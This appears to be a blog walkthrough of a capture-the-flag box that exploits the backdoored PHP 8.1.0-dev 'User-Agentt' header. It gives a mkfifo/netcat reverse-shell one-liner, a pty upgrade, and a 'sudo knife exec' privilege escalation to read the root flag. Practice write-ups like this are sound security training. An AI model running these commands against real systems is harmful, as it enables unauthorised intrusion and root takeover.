top of page



As usual, let's start with nmap:

nmap -sV -sC

curl -I

Let's google php/8.1.0-dev exploit and see what we can find.

We find this exploit on exploit-db:

It says:

"An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header. The following exploit uses the backdoor to provide a pseudo shell on the host."

Let's download the exploit to our VM


Enter the url of the target machine

We got the shell!


The shell is not very interactive, it doesn't respond to the cd command, but we can use this trick:

From your VM, open a new command prompt and type

nc -lnvp 1234

Now from the target's machine type:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f

Now go back to your netcat (nc) if you've got a shell!

python3 -c 'import pty;pty.spawn("/bin/bash")'

Now we have a proper shell!


Congratulations! You got the user flag!

Now let's try to get the root flag:

Access is denied so we need to escalate our privileges.

Privilege Escalation

sudo -l

This means the command knife can be called as root without providing any passwords!

After googling how to use knife, we come up with this command:

sudo knife exec -E 'system("cat /root/root.txt")'


Congratulations! You got the root flag!

120 views0 comments

Recent Posts

See All




bottom of page